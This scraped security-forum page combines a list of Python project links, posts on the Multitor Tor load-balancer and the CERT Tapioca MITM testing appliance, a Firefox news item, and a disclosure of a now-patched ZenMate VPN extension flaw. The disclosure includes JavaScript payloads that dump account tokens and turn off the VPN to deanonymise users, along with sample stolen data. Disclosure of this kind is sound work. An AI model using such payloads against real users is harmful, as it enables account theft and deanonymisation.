wrapped around MongoEngine https://github.com/closeio/flask-mongorest django-token : https://github.com/jasonbeverage/django-token django-mediamanager : https://github.com/jasonbeverage/django-mediamanager A Command Line Interface for Neo4j's Cypher. https://github.com/nicolewhite/cycli Utility for currying functions https://github.com/chrfrasco/curry.py pybot : https://github.com/magsol/pybot Integration layer between Requests and Selenium for automation of web actions https://github.com/tryolabs/requestium Selenium-Requests : https://github.com/cryzed/Selenium-Requests Sustainable case-class serialization library https://github.com/harelba/serium Python client for Apache Kafka https://github.com/dpkp/kafka-python A library and tool for generating .pex (Python EXecutable) files https://github.com/pantsbuild/pex Convert CSV files into a SQLite database https://github.com/simonw/csvs-to-sqlite An easy to use job launcher for supercomputers with PBS compatible job manager. https://github.com/SMART-Lab/smartdispatch A lightweight, object-oriented finite state machine implementation in Python https://github.com/pytransitions/transitions Python library for interactive topic model visualization. Port of the R LDAvis package. https://github.com/bmabey/pyLDAvis Python CloudWatch Logging: Log Analytics and Application Intelligence https://github.com/kislyuk/watchtower Python and tab completion, better together. https://github.com/kislyuk/argcomplete Flintrock is a command-line tool for launching Apache Spark clusters. https://github.com/nchammas/flintrock Flintrock is a command-line tool for launching Apache Spark clusters. https://github.com/nchammas/flintrock https://github.com/forcedotcom/distributions vn.py is based on Python's open source quantitative trading program development framework, originated in the domestic private equity independent quantitative trading system. https://github.com/vnpy/vnpy Bulk-Bing-Image-downloader : https://github.com/ostrolucky/Bulk-Bing-Image-downloader KicomAV is an open source (GPL v2) antivirus engine designed for detecting malware and disinfecting it. https://github.com/hanul93/kicomav Distributed Asynchronous Hyperparameter Optimization in Python https://github.com/hyperopt/hyperopt Dynamic histograms in the terminal https://github.com/coelias/dyst Pilot to work with dynamic visualization by using python https://github.com/coelias/Pynteractive Terrain rendering in less than 20 lines of code https://github.com/s-macke/VoxelSpace This project is a gui made in python3 and QT4 for youtube-dl use. https://gitlab.com/sergiotucano/simplesgui The CALDERA automated adversary emulation system https://github.com/mitre/caldera A library for ptrace-based tracing of Python programs https://github.com/pinterest/ptracer Generate PyAnnotate annotations from your pytest tests. https://github.com/kensho-technologies/pytest-annotate?utm_content=buffere1e61&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer DuckDuckGo from the terminal https://github.com/jarun/ddgr Powerful command-line bookmark manager. Your mini web! https://github.com/jarun/Buku Google Search, Google Site Search, Google News from the terminal https://github.com/jarun/googler Blazing fast image resizer and rotator. Go crunch 'em! https://github.com/jarun/imgp tiredful-api : https://github.com/payatu/tiredful-api OpenTracing instrumentation for the Flask microframework https://github.com/opentracing-contrib/python-flask generative algorithm https://github.com/inconvergent/fracture Simple python script to download Bandcamp albums https://github.com/iheanyi/bandcamp-dl Terminal string styling done right, in Python https://github.com/timofurrer/colorful Python API to execute shell functions as they would be Python functions https://github.com/timofurrer/shellfuncs A python toolbox for gaining geometric insights into high-dimensional data https://github.com/ContextLab/hypertools A transpiler that converts Python code into Java bytecode https://github.com/pybee/voc A test utility for mocking out requests host from a fixtures directory https://github.com/tonybaloney/requests-staticmock PyPika is a SQL query builder with a pythonic syntax that doesn't limit the expressiveness of SQL https://github.com/kayak/pypika awesome-python-cn : https://github.com/jobbole/awesome-python-cn vmprof - a statistical program profiler https://github.com/vmprof/vmprof-python Distributed profiling on the cheap https://github.com/nylas/nylas-perftools Call stack profiler for Python. Inspired by Apple's Instruments.app https://github.com/joerick/pyinstrument The Tingbot operating system https://github.com/tingbot/tingbot-os Build Python wheels on CI with minimal configuration https://github.com/joerick/cibuildwheel qgsazimuth : https://github.com/mpetroff/qgsazimuth Measures CPU time (instead of wall time) and designed specially for greenlets. Can help you to find CPU heavy parts of your code and improve responsiveness of your gevent-based application. https://bitbucket.org/rushman/gprof A simple Django app to handle Let's Encrypt ACME challenges https://github.com/urda/django-letsencrypt Django MediaWiki Authentication https://github.com/mpetroff/django-mediawiki-authentication Example repo showing how to build wheels with cibuildwheel and automatically upload to PyPI on every tag https://github.com/joerick/cibuildwheel-autopypi-example Cross-platform, multi-site, multi-threaded manga downloader with over 5000 distinct mangas. Includes support for automated downloading via external .xml file and conversion for viewing on the Kindle. https://github.com/jiaweihli/manga_downloader A Leap Motion based mouse in Python https://github.com/openleap/PyLeapMouse A module for cross-platform control of the mouse and keyboard in python that is simple to install and use. https://github.com/PyUserInput/PyUserInput An in-browser Python profile viewer https://github.com/jiffyclub/snakeviz Pyflame: A Ptracing Profiler For Python https://github.com/uber/pyflame/blob/master/docs/index.rst Python client for CockroachDB https://github.com/cockroachdb/cockroachdb-python Scheduled buying of BTC, ETH, and LTC from GDAX optimally! https://github.com/brndnmtthws/optimal-buy-gdax Notification system for Django with batteries included: Email digests, user settings, JSON API https://github.com/benjaoming/django-nyt OAuth + JupyterHub Authenticator = OAuthenticator https://github.com/jupyterhub/oauthenticator Multi-user server for Jupyter notebooks https://github.com/jupyterhub/jupyterhub Turn git repositories into Jupyter enabled Docker Images https://github.com/jupyter/repo2docker BINARY BLACK HOLE SIGNALS IN LIGO OPEN DATA : https://github.com/minrk/ligo-binder/blob/master/index.ipynb warn : https://github.com/Carreau/warn Q11_languages.ipynb : https://github.com/labarba/NSFcommittee-SI2017/blob/master/Q11_languages.ipynb ligo-binder : https://github.com/minrk/ligo-binder Scale down Kubernetes deployments after work hours https://github.com/hjacobs/kube-downscaler Click command line utilities https://github.com/hjacobs/python-clickclick CLI for deployment to Kubernetes via Deploy API https://github.com/robin-wittler/zalando-deploy-cli Tools to support converting a Python project into a standalone native application. https://github.com/pybee/briefcase scrapedin : https://github.com/dchrastil/scrapedin picoweb : https://github.com/pfalcon/picoweb BigQuery-Python : https://github.com/tylertreat/BigQuery-Python python-csiphash : https://github.com/zacharyvoase/python-csiphash django-app-metrics : https://github.com/frankwiles/django-app-metrics django-pagebits : https://github.com/frankwiles/django-pagebits retrace : https://github.com/d0ugal/retrace qualityvis : https://github.com/slaporte/qualityvis Useful-python : https://github.com/robmarkcole/Useful-python webhookit : https://github.com/hustcc/webhookit spawningtool : https://github.com/StoicLoofah/spawningtool heroprotocol : https://github.com/Blizzard/heroprotocol chai : https://github.com/agoragames/chai PyBrowserID : https://github.com/mozilla/PyBrowserID s2protocol : https://github.com/Blizzard/s2protocol mpyq : https://github.com/eagleflo/mpyq hiss : https://github.com/KennethanCeyer/hiss nameko-sqlalchemy : https://github.com/onefinestay/nameko-sqlalchemy systemd-utils : https://github.com/kylemanna/systemd-utils django-cache-machine : https://github.com/django-cache-machine/django-cache-machine addons.mozilla.org Django app and API https://github.com/mozilla/addons-server An adapter for using Jinja2 templates with Django. https://github.com/jbalogh/jingo amzscraper : https://github.com/tobiasmcnulty/amzscraper rapidsms : https://github.com/rapidsms/rapidsms django-basic-apps : https://github.com/nathanborror/django-basic-apps django-babel-underscore : https://github.com/EnTeQuAk/django-babel-underscore django-rest-framework : https://github.com/encode/django-rest-framework Python database migration tool based on git's design. https://github.com/KennethanCeyer/hiss django-mediacat : https://github.com/onefinestay/django-mediacat mysql-connector-python : https://github.com/mysql/mysql-connector-python geograpy : https://github.com/PandaWhoCodes/geograpy marshmallow : https://github.com/marshmallow-code/marshmallow webargs : https://github.com/sloria/webargs cookiecutter-flask : https://github.com/sloria/cookiecutter-flask Configures your Python shell https://github.com/sloria/konch RedPitaya : https://github.com/RedPitaya/RedPitaya Unofficial Duolingo API Written in Python https://github.com/KartikTalwar/Duolingo heroku3.py : https://github.com/martyzz1/heroku3.py django-easy-pjax : https://github.com/nigma/django-easy-pjax django-easy-pdf : https://github.com/nigma/django-easy-pdf django-session-activity : https://github.com/nigma/django-session-activity django-twilio-sms : https://github.com/nigma/django-twilio-sms django-infinite-pagination : https://github.com/nigma/django-infinite-pagination SASS processor to compile SCSS files into *.css, while rendering, or offline. https://github.com/jrief/django-sass-processor Let AngularJS play well with Django https://github.com/jrief/django-angular django-websocket-redis : https://github.com/jrief/django-websocket-redis djangocms-bootstrap3 : https://github.com/jrief/djangocms-bootstrap3 django-admin-sortable2 : https://github.com/jrief/django-admin-sortable2 thinkster-django-angular : https://github.com/brwr/thinkster-django-angular django-rest-swagger : https://github.com/marcgibbons/django-rest-swagger django-selenium-docker : https://github.com/marcgibbons/django-selenium-docker conduit-django : https://github.com/brwr/conduit-django django-seo-js : https://github.com/skoczen/django-seo-js django-ajax-uploader : https://github.com/skoczen/django-ajax-uploader Will is a simple, beautiful-to-code bot for slack, hipchat, and a whole lot more https://github.com/skoczen/will Forms, widgets, template tags and examples that make Stripe + Django easier. https://github.com/GoodCloud/django-zebra A screencast tool to display your keys inspired by Screenflick https://github.com/wavexx/screenkey How rotten are your requirements? https://github.com/sesh/piprot anyprint : https://github.com/kragniz/anyprint Python client for the etcd API v3 https://github.com/kragniz/python-etcd3 Python ODBC bridge https://github.com/mkleehammer/pyodbc allseasons : https://github.com/pfctdayelise/allseasons dapbook : https://github.com/pfctdayelise/dapbook leafvis : https://github.com/pfctdayelise/leafvis tablib : https://github.com/kennethreitz/tablib Pydap is a pure Python library implementing the Data Access Protocol, also known as DODS or OPeNDAP. http://www.pydap.org/en/latest/ CLI for scraping a web page to create a Spotify playlist https://github.com/markreid/scrapify pytest-design : https://github.com/pytest-dev/pytest-design File and Image Management Application for django https://github.com/divio/django-filer Pluggable app to allow Django developers to quickly add meta tags and OpenGraph, Twitter, and Google Plus properties to their HTML responses https://github.com/nephila/django-meta A Django app for managing robots.txt files following the robots exclusion protocol https://github.com/jazzband/django-robots django-better500s : https://github.com/aquametalabs/django-better500s django-static : https://github.com/peterbe/django-static lockbox : https://github.com/johnwheeler/lockbox instagram-profilecrawl : https://github.com/timgrossmann/instagram-profilecrawl Various popular python libraries, pre-compiled to be compatible with AWS Lambda https://github.com/Miserlou/lambda-packages nyc-geoclient : https://github.com/talos/nyc-geoclient HTTP/2 for Python https://github.com/Lukasa/hyper alexa-tunnel : https://github.com/johnwheeler/alexa-tunnel OctoPrint is the snappy web interface for your 3D printer https://github.com/foosel/OctoPrint Scripts to build OctoPi, a Raspberry PI distro for controlling 3D printers over the web https://github.com/guysoft/OctoPi Watcher is an automated movie NZB & Torrent searcher and snatcher https://github.com/nosmokingbandit/Watcher3 Unicorn PE function runner https://github.com/inaz2/Unico Unofficial Python wrapper for official Hacker News API https://github.com/avinassh/haxor Manage your virtualenvs directly from Sublime Text 3 https://github.com/AdrianLC/sublime-text-virtualenv django-guardian : https://github.com/django-guardian/django-guardian geopy : https://github.com/geopy/geopy django-parler-rest : https://github.com/django-parler/django-parler-rest package_control_channel : https://github.com/wbond/package_control_channel django-debug-toolbar-autoreload : https://github.com/gregmuellegger/django-debug-toolbar-autoreload django-floppyforms : https://github.com/gregmuellegger/django-floppyforms Streisand sets up a new server running your choice of L2TP/IPsec, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, a Tor bridge, and WireGuard. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, https://github.com/StreisandEffect/streisand fellow Google Search Results via SERP API pip Python Package https://github.com/serpapi/google-search-results-python Python m3u8 Parser for HTTP Live Streaming (HLS) Transmissions https://github.com/globocom/m3u8 pytest-ansible : https://github.com/jlaska/pytest-ansible Plugin for py.test that associates tests with github issues using a marker https://github.com/jlaska/pytest-github ansible-playbooks : https://github.com/jlaska/ansible-playbooks CloudVisionPortal-Examples : https://github.com/aristanetworks/CloudVisionPortal-Examples A plugin for pyang that creates Python bindings for a YANG model https://github.com/robshakir/pyangbind An extensible YANG validator and converter in python https://github.com/mbj4668/pyang The lxml XML toolkit for Python https://github.com/lxml/lxml presto-admin : https://github.com/prestodb/presto-admin Dumb downloader that scrapes the web https://github.com/soimort/you-get Easy & Flexible Alerting With ElasticSearch https://github.com/Yelp/elastalert Python client-side web development framework https://github.com/anpylar/anpylar User-friendly deployment and management tool for AWS Lambda function https://github.com/marcy-terui/lamvery The rscoin centrally banked cryptocurrency https://github.com/gdanezis/rscoin Ansible examples from Ansible for DevOps https://github.com/geerlingguy/ansible-for-devops graphene : https://github.com/graphql-python/graphene Odoo. Open Source Apps To Grow Your Business https://github.com/odoo/odoo python library that implements a number of Privacy Enhancing Technolgies https://github.com/gdanezis/petlib An hash-chain with efficient O(1) append and O(logN) proof. https://github.com/gdanezis/rousseau-chain python-gitlab : https://github.com/python-gitlab/python-gitlab metadata_parser : https://github.com/jvanasco/metadata_parser ansible-hardening : https://github.com/openstack/ansible-hardening Tell you what is happening on your terminal https://github.com/saitoha/trachet Functional tests for command line applications https://github.com/brodie/cram build system for building a portable python interpreter https://github.com/Infinidat/relocatable-python The right way to check the weather https://github.com/chubin/wttr.in curl cryptocurrencies exchange rates https://github.com/chubin/rate.sx A CLI with autocompletion and syntax highlighting for Docker commands. https://github.com/j-bennet/wharfee Python library providing function decorators for configurable backoff and retry https://github.com/litl/backoff light REST library for Django https://github.com/funkybob/django-nap Manage dynamic plugins for Python applications https://pypi.python.org/pypi/stevedore byro : https://github.com/byro/byro pymag-trees : https://github.com/llimllib/pymag-trees django-autoscroll : https://github.com/iogf/django-autoscroll Python library for Kakaotalk chatbot https://github.com/JungWinter/chatterbox Find the awesome curated list without browser https://github.com/mingrammer/awesome-finder The most complete open-source tool for Twitter intelligence analysis https://github.com/vaguileradiaz/tinfoleak EasyWebDAV: A WebDAV Client in Python https://github.com/amnong/easywebdav SQLAlchemy extension for attaching images to entities. https://github.com/dahlia/sqlalchemy-imageattach A CMS framework for Django built on a heterogenous tree editor https://github.com/fusionbox/django-widgy django CMS Bootstrap 4 is a plugin bundle for django CMS providing several components from the popular Bootstrap 4 framework. https://github.com/divio/djangocms-bootstrap4 djangocms-googlemap : https://github.com/divio/djangocms-googlemap A straightforward binding of libsass for Python. Compile Sass/SCSS in Python with no Ruby stack at all https://github.com/sass/libsass-python Command-line debugger powered by Stack Overflow https://github.com/shobrook/rebound Sortable Photo album Using a Django based database. https://github.com/brianmay/spud Cluster account management tool https://github.com/Karaage-Cluster/karaage python-tldap : https://github.com/Karaage-Cluster/python-tldap Django unicode-aware password policies. https://github.com/tarak/django-password-policies Keep that navigation logic in the presentation layer where it belongs https://github.com/SmileyChris/django-navtag django-mailer : https://github.com/pinax/django-mailer strictly RFC 4510 conforming LDAP V3 pure Python client https://github.com/cannatag/ldap3 aiotasks: A Celery like task manager that distributes Asyncio coroutines https://github.com/cr0hn/aiotasks Docker security analysis & hacking tools https://github.com/cr0hn/dockerscan Python 3 /asyncio library for Lifx https://github.com/frawau/aiolifx sublime_tower_plugin : https://github.com/tedmiston/sublime_tower_plugin Ordered Set implementation in Cython https://github.com/simonpercivall/orderedset An AST unparser for Python https://github.com/simonpercivall/astunparse Track your life like a pro on Google Calendar via your terminal. https://github.com/adamchainz/lifelogger Nose plugin to randomly order tests and control random.seed https://github.com/adamchainz/nose-randomly Its a spicy meatball for serving up fresh hot entity-relationship diagrams straight from your django models. https://github.com/LegoStormtroopr/django-spaghetti-and-meatballs django-data-interrogator : https://github.com/LegoStormtroopr/django-data-interrogator Immutable, Pythonic, correct URLs. https://github.com/python-hyper/hyperlink little app that transforms and formats data. https://github.com/zapier/transformer Add webhook subscriptions to your Django app. https://github.com/zapier/django-rest-hooks python-google-places : https://github.com/slimkrazy/python-google-places The Python Shapefile Library (pyshp) reads and writes ESRI Shapefiles in pure Python. https://github.com/GeospatialPython/pyshp A simple Python Geojson file reader and writer https://github.com/karimbahgat/PyGeoj MaxMind-DB-Reader-python : https://github.com/maxmind/MaxMind-DB-Reader-python yarGen is a generator for YARA rules https://github.com/Neo23x0/yarGen Loki - Simple IOC and Incident Response Scanner https://github.com/Neo23x0/Loki Online hash checker for Virustotal and other services https://github.com/Neo23x0/munin Hue will help you to print awesomely in terminals. https://github.com/UltimateHackers/hue Framework for large distributed pipelines https://github.com/substantic/rain Virtual environment for Node.js & integrator with virtualenv https://github.com/ekalinin/nodeenv Exports systemd logs to an external service, eg cloudwatch, elasticsearch https://github.com/techjacker/systemdlogger Turn (almost) any command line program into a full GUI application with one line https://pypi.org/project/Gooey/ Python bindings to Modest engine (fast HTML5 parser with CSS selectors). https://github.com/rushter/selectolax Source: https://github.com/gauravssnl/awesome-python-modules

May 29, 2018
- 2

Multitor - A tool that lets you create multiple TOR instances with a load-balancing.

Fi8sVrs posted a topic in Programe hacking

A tool that lets you create multiple TOR instances with a load-balancing traffic between them by HAProxy. It's provides one single endpoint for clients. In addition, you can view previously running TOR processes and create a new identity for all or selected processes. Description A tool that lets you create multiple TOR instances with a load-balancing traffic between them by HAProxy. It's provides one single endpoint for clients. In addition, you can view previously running TOR processes and create a new identity for all or selected processes. The multitor has been completely rewritten on the basis of: Multi-TOR project written by Jai Seidl: Multi-TOR original source is (Sebastian Wain project): Distributed Scraping With Multiple TOR Circuits How To Use Before using the multitor, detailed understanding all parameters and how it works, see the Manual. It's simple: # Clone this repository git clone https://github.com/trimstray/multitor # Go into the repository cd multitor # Install ./setup.sh install # Run the app multitor --init 2 --user debian-tor --socks-port 9000 --control-port 9900 symlink to bin/multitor is placed in /usr/local/bin man page is placed in /usr/local/man/man8 Parameters Provides the following options: Usage: multitor <option|long-option> Examples: multitor --init 2 --user debian-tor --socks-port 9000 --control-port 9900 multitor --show-id --socks-port 9000 Options: --help show this message --debug displays information on the screen (debug mode) --verbose displays more information about TOR processes -i, --init <num> init new tor processes -k, --kill kill all multitor processes -s, --show-id show specific tor process id -n, --new-id regenerate tor circuit -u, --user <string> set the user (only with -i|--init) --socks-port <port_num|all> set socks port number --control-port <port_num> set control port number --proxy <socks|http> set load balancer Requirements Multitor uses external utilities to be installed before running: tor netcat haproxy polipo Also you will need root access. Other Important If you use this tool in other scripts where the output is saved everywhere, not on the screen, remember that you will not be able to use the generated password. I will correct this in the next version. If you do not use regenerate function of single or all TOR circuits with a password, you can safely restart the multitor which will do it for you. Limitations each TOR process needs a certain number of memory. If the number of processes is too big, the oldest one will be automatic killed by the system Polipo is no longer supported but it is still a very good and light proxy. In the next version I will give you the option to choose a different solution. TOR is a fine security project and an excellent component in a strategy of defence in depth but it isn’t (sadly) a cloak of invisibility. When using the TOR, always remember about ssl (eg. https) wherever it is possible. Contribuiting See this. Project architecture See this. Download: multitor-master.zip or git clone https://github.com/trimstray/multitor.git Source

May 29, 2018

ZenMate VPN Browser Extension Deanonymization & Hijacking Vulnerability (3.5 Million Affected Users)

Fi8sVrs posted a topic in Stiri securitate

Summary ZenMate, a VPN provider with over 43 million users, offers multiple browser extensions to use their VPN with. As of the time of this writing the browser extensions have a combined total of ~3.5 million users. The ZenMate VPN clients for both Chrome & Firefox trust the (previously) expired domain name zenmate.li which can make privileged API calls to the browser extension via message passing. I saw that this domain name was unregistered and bought it to both prove the issue and mitigate the vulnerability (since nobody else can buy it now that I own it). By hosting scripts on this domain it is possible to make use of the privileged APIs exposed via the page_api.js Content Script. After reaching out to the vendor they pushed out a fix very quickly and it is available in the latest version of the extension. Impact The impact of this exploit is the following, all of it can be done without any user interaction (other then that they must visit a webpage): Dump all of the account information of the victim. The following is a list of some of the interesting bits: Authentication UUID and secret token which can be used to login to the victim’s account. Account ID Email Address Email Confirmation status A list of all past email addresses used with the service, as well as when each change occured. Account Type, and Subscription Information Victim’s country Device information along with detailed platform information, last sign-in time, usage stats such as ads/malware blocked, the device token, and more. Whether or not the victim is connected to the VPN service. Toggle off their VPN connection, allowing the attacker to reveal the victim’s true IP address and deanonymize them. Update the credentials which the extension is using (e.g. log the victim’s extension into another account). Inject rules into the extension which will force the extension not to proxy when visiting specifically declared sites. This allows an attacker to inject rules for domains they own in order to persist the deanonymization. Vulnerability Details The following is an excerpt from the Chrome extension’s manifest.json: ...trimmed for brevity… { "js": [ "scripts/page_api.js" ], "matches": [ "*://*.zenmate.com/*", "*://*.zenmate.ae/*", "*://*.zenmate.ma/*", "*://*.zenmate.dk/*", "*://*.zenmate.at/*", "*://*.zenmate.ch/*", "*://*.zenmate.de/*", "*://*.zenmate.li/*", "*://*.zenmate.ca/*", "*://*.zenmate.co.uk/*", "*://*.zenmate.ie/*", "*://*.zenmate.co.nz/*", "*://*.zenmate.com.ar/*", "*://*.zenmate.cl/*", "*://*.zenmate.co/*", "*://*.zenmate.es/*", "*://*.zenmate.mx/*", "*://*.zenmate.com.pa/*", "*://*.zenmate.com.pe/*", "*://*.zenmate.com.ve/*", "*://*.zenmate.fi/*", "*://*.zenmate.fr/*", "*://*.zenmate.co.il/*", "*://*.zenmate.in/*", "*://*.zenmate.hu/*", "*://*.zenmate.co.id/*", "*://*.zenmate.is/*", "*://*.zenmate.it/*", "*://*.zenmate.jp/*", "*://*.zenmate.kr/*", "*://*.zenmate.lu/*", "*://*.zenmate.lt/*", "*://*.zenmate.lv/*", "*://*.zenmate.my/*", "*://*.zenmate.be/*", "*://*.zenmate.nl/*", "*://*.zenmate.pl/*", "*://*.zenmate.com.br/*", "*://*.zenmate.pt/*", "*://*.zenmate.ro/*", "*://*.zenmate.com.ru/*", "*://*.zenmate.se/*", "*://*.zenmate.sg/*", "*://*.zenmate.com.ph/*", "*://*.zenmate.com.tr/*", "*://*.zenmate.pk/*", "*://*.zenmate.vn/*", "*://*.zenmate.hk/*" ], "run_at": "document_start" } ...trimmed for brevity... The above shows that the Content Script scripts/page_api.js is run on all pages matching the patterns listed above. One of these is the *://*.zenmate.li/* pattern, which was the expired domain name that I bought. The page_api.js Content Script does two things: Injects a <script> tag into the DOM of my zenmate.li site, which sets window.__zm to an object with methods for calling the privileged extension API. Sets up listeners for the following custom events: toggle setPageExcludes updateZM removeCredentials updateWithCredentials request:getData Due to the extension’s trust of the zenmate.li domain (and any of its subdomains), we can make use of these privileged calls to do nefarious actions. For example, we can pull all of the user’s account information by making the request:getData call. The following is an example payload which does this: // Make call to Content Script to get all user data __zm.getData(function(results) { console.log( results ); }); Upon an arbitrary user with the ZenMate VPN extension installed visiting the zenmate.li page with this payload hosted on it, we can extract all of the sensitive user information for the victim. The following is an example of the data you can steal (I used a temporary account I created for this demo): { "user": { "id": 43643953, "email": "mandatory@yopmail.com", "unconfirmed_email": null, "flags": {}, "premium_expires_at": "2018-06-04 01:33:22 UTC", "partner_id": null, "idhash": "c86d4aac37946935a5e13c543326e5477fe9b43a0a2b2307db5977797d48d5c1", "marketable": true, "mkt_opt_in": "out", "opt": "out", "banned": false, "discount_code": "7JGA-QLKU-J930-EVAH", "confirmation_sent_at": "2018-05-28 05:57:04 UTC", "has_recurring_subscription": false, "is_intermediate_premium": true, "paid_premium_expires_at": null, "created_at": "2018-05-28 00:48:25 UTC", "account_type": "PREMIUM", "server_time": "2018-05-28 05:58:16 UTC", "actual_country": "US", "subscription_country": "US", "country_code": "US", "locale": "US", "connected_country": "", "connected": false, "current_ip": "172.68.140.235", "anon": false, "is_premium": true, "is_verified": true, "is_b2b": false, "is_btr": true, "active_product": "premium", "service_status": "trial", "is_tenant": false, "is_anonymous": false, "bus_id": null, "has_opted_in": false, "reminder_emails": true, "active_order_id": 9532193, "recurrence_count": 0, "affiliate_id": null, "subscription": { "purchased_at": "2018-05-28 01:33:22 UTC", "expires_at": "2018-06-04 01:33:22 UTC", "sku": "7_day", "title": "Premium trial", "description": "7 days free Premium" }, "email_history": [ { "changed_from": "alt.s4-bs92bpb@yopmail.com", "changed_to": "mandatory@yopmail.com", "created_at": "2018-05-28T07:57:14.657+02:00" } ] }, "device": { "created_at": "2018-05-28 04:11:41 UTC", "current_sign_in_at": "2018-05-28 05:58:16 UTC", "features": [ { "id": "ADBLOCK", "enabled": true, "available": true, "description": "Enable ad blocking" }, { "id": "MALWAREBLOCK", "enabled": true, "available": true, "description": "Enable blocking of harmful sites" } ], "id": 59551317, "install_id": "ee983860-753a-14f6-31c0-208bff9e9bf5", "last_sign_in_at": "2018-05-28 04:11:45 UTC", "platform": { "id": "72338bed-f4ec-483c-b6f6-2771c38e92a9", "platform_name": "Chrome", "platform_vendor": "Google", "icon": "chrome", "environment": "browser_extension" }, "platform_version": [], "registered_for_push_notifications": false, "stats": { "ads_blocked": 0, "bad_sites_blocked": 0, "gzip_compression_ration": 0, "webp_compression_ratio": 0, "compresssion_ratio": 0 }, "token": "e09a9bdbcf8c6fda2c11c60eb761a943d4ab448c3dbf0579938780f18ce35f16", "updated_at": "2018-05-28 05:58:16 UTC", "uuid": "d8fa9eed-47c8-4566-9e57-a812495d3b4c" }, "version": "6.2.3" } Deanonymizing a user is similar and can be done with a payload like the following: // Turn off VPN __zm.toggle(false); The following proof-of-concept page to demonstrate this issue. Upon visiting it with the (previously vulnerable) ZenMate VPN extension installed, your VPN will be toggled off and your account information will be dumped and your real IP will be revealed: https://zenmate.li/poc.html Thoughts on Root Cause & Remediation This vulnerability exhibits a fairly common coding pattern in Chrome extensions where privileged API calls are declared inside of the extension and are then delegated via Content Scripts to regular web domains owned by the author for calling. This coding pattern is generally problematic because Chrome extensions enforce things like minimum Content Security Policies (CSP) and have external navigation and embedding blocking enabled by default. When you build a bridge outside of the secured Chrome extension environment and then greatly increase the attack surface via over-scoping you’re setting yourself up for failure. With the Content Script policy previously in place, all that is required for an attacker to make privileged extension API call is an XSS (or domain/sub-domain takeover) in any sub-domain of any of the dozens of domains listed. The patch applied by the vendor for both the Chrome and Firefox extension was to remove all domains except for *://*.zenmate.com/*. While this is still a fairly wide scope, it is at least preferable to the original policy. However, all that it would take to exploit this vulnerability again would be an XSS in any sub-domain of zenmate.com (or the base domain). Exploit Video Source

May 29, 2018
- 1

New Firefox Release Will Stop Malicious Crypto Mining and Enhance Users’ Privacy

Fi8sVrs posted a topic in Stiri securitate

The next October 2018 update for Firefox will include tracking protection as well as adding an additional layer of protection that will protect its users from being crypto mining websites. Tracking Protection in Firefox will be enabled by default as it is an essential part of today’s Internet. Most users don’t know that this feature exists because it is under so many sub menus. Tracking Protection will protect against malicious JavaScript and also prevents data sharing between websites. “You’re often followed by scripts that collect data on where you’ve been and what you’ve done,” Mozilla noted in a Wednesday blog post. “These scripts can eat up your data, slow down your Internet experience and make you see ads for things you may or may not want to admit you looked for when you went down one of those “suggested items” rabbit holes.” Tracking protection will stop the process that logs user data for sharing between websites. This is great for Internet users as it will improve the user experience. The tracking protection feature will also prevent malicious websites from selling your information. This scale of security is good for the working professionals and business users. The protection against crypto miners, tracking cookies and threats that are blocked by the tracking protection can be very important in aiding users to evade security risks. The release of Firefox 63 will also be simple to use with new UI elements that provide easy toggle tracking protection. The aim of the tracking protection is to prevent unwanted advertisements, social sharing scripts and analytics. At present, you won’t be able to block the cryptocurrency mining websites with Firefox itself, however in the meantime you can install add-ons for privacy and blocking crypto mining activities. Mozilla foundation also released the roadmap for 2018 by featuring many improvements that will improve the life of developers. Via latesthackingnews.com

May 29, 2018

tapioca - CERT Tapioca for MITM network analysis

Fi8sVrs posted a topic in Mobile security

Overview CERT Tapioca is a utility for testing mobile or any other application using MITM techniques. CERT Tapioca development was sponsored by the United States Army Armament Research, Development and Engineering Center (ARDEC) as well as the United States Department of Homeland Security (DHS). Installation requirements: Supported platforms include: Raspbian (Jessie or Stretch), Centos 7, RedHat Enterprise Linux 7, Fedora (24 through 28), or Ubuntu (14.04, 16.04, or 18.04). Other platforms may work, but the installer has only been tested on these distros. 1GB of RAM Upstream internet connectivity that does not require an explicit proxy. Ability to provide wireless access to your device under test, which means either: An available wired network adapter that a wireless access point can be plugged into. A USB wireless adapter that supports HOSTAP mode. e.g. https://smile.amazon.com/TP-Link-N150-Wireless-Adapter-TL-WN722N/dp/B002SZEOLG NOTE: CERT Tapioca installation will transform your system into a Tapioca "appliance". It is not recommended to install it on a system that you use for other purposes. Pre-installation Install a supported Linux distribution on your machine. Running on bare metal and in a virtual machine are supported. Any installation style (from text-only through full GUI) for the host OS is supported. Just ensure: Internet connectivity is working. A user named "tapioca" exists, and has administrative privileges. The "tapioca" user is logged in. Client connectivity options Before installing Tapioca, decide how you will be providing network connectivity to the clients under test. Options include: Use a wired network adapter. This adapter should be configured to use the IP 10.0.0.1/24 before attempting installation. Other addressing schemes can be used, but will require editing tapioca.cfg and /etc/dhcp/dhcpd.conf Use a wireless USB adapter that supports HOSTAP mode. Security notes CERT Tapioca requires root privileges for several capabilities that it uses. For this reason, the Tapioca installer configures a system to not prompt the user for sudo privileges. Any user with access to the CERT Tapioca system will have root privileges. The "Full HTTPS inspection" certificate/key combination is static across all CERT Tapioca installations. For this reason, any system or device that has the full HTTPS inspection mitmproxy root CA certificate installed should not be used on untrusted networks. The same capability that allows you to use Tapioca to fully inspect HTTPS traffic can allow anyone else with a CERT Tapioca installation to perform the same inspection. Installation Obtain the Tapioca code. This can be accomplished by performing a git clone of the Tapioca repository, or by downloading and extracting a zip file of the repository. Ensure that the Tapioca code lives in the /home/tapioca/tapioca directory. If you have obtained Tapioca via a zip file, this may require that you rename the tapioca-master directory to tapioca. Run the installer: [tapioca@localhost tapioca]$ ./install_tapioca.sh Follow any prompts. Reboot when done. If given a choice, log in with the tapioca user and choose the Xfce login session. If for any reason the installation fails, check and correct any relevant errors and run ./install_tapioca.sh again. Tapioca Quick Start Testing Apps on Wireless Devices Using HOSTAP adapter Connect a HOSTAP-capable WiFi adapter to your Tapioca machine. Click the Software WiFi AP button (Radio tower) to enable your wireless access point. Connect your device to the Tapioca access point. Click the Tapioca GUI button to launch the main testing interface. Testing Apps on Wireless Devices Using Access point Configure the Tapioca machine second network adapter to be 10.0.0.1/24 If this network was not already configured at install time, re-run ./install_tapioca.sh or manually edit tapioca.cfg to specify this network device name for internal_net. Connect the access point uplink port to the Tapioca LAN port. Connect your device to the access point. Click the Tapioca GUI button to launch the main testing interface. Testing Apps on Virtual Machines Configure the Tapioca machine second second network adapter to be 10.0.0.1/24 If this network was not already configured at install time, re-run ./install_tapioca.sh or manually edit tapioca.cfg to specify this network device name for internal_net. Click the 